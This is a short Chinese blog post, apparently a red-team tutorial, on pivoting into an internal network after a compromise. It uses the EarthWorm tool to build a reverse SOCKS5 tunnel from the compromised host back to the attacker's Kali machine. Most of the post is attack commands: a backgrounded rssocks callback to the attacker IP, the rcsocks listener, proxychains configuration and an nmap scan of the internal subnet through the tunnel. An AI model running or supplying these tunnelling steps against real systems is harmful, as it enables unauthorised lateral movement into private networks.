-
路由转发只能将msfconsole带进内网,而要想将攻击机上的其他攻击程序也带进内网还 需要搭建socks代理。.earthworm搭建socks5反向代理服务 是为了让kali(攻击者) 的程序进入内网,可以扫描内网主机信息等
-
git clone https://github.com/idlefire/ew.git
- 靶机设置
nohup ./ew_for_linux64 -s rssocks -d 192.168.1.128 -e 1234 &
#192.168.1.128 是攻击者kali的IP地址 - kali设置
./ew_for_linux64 -s rcsocks -l 1080 -e 1234
#将1080端口监听到的本地数据转发到 web服务器的1234端口
# 通过1080端口,将本地流量转发出去
#rcsocks、rssocks 用于反向连接
#ssocks 用于正向连接
# -l 指定本地监听的端口
# -e 指定要反弹到的机器端口
# -d 指定要反弹到机器的IP
# -f 指定要主动连接的机器 ip
# -g 指定要主动连接的机器端口
# -t 指定超时时长,默认为 1000vim /etc/proxychains4.conf
socks5 127.0.0.1 1080 - 需要代理的攻击加上proxychains4即可
proxychains4 nmap -Pn 192.168.1.1/24
ew
发布于 2022-04-09 80 次阅读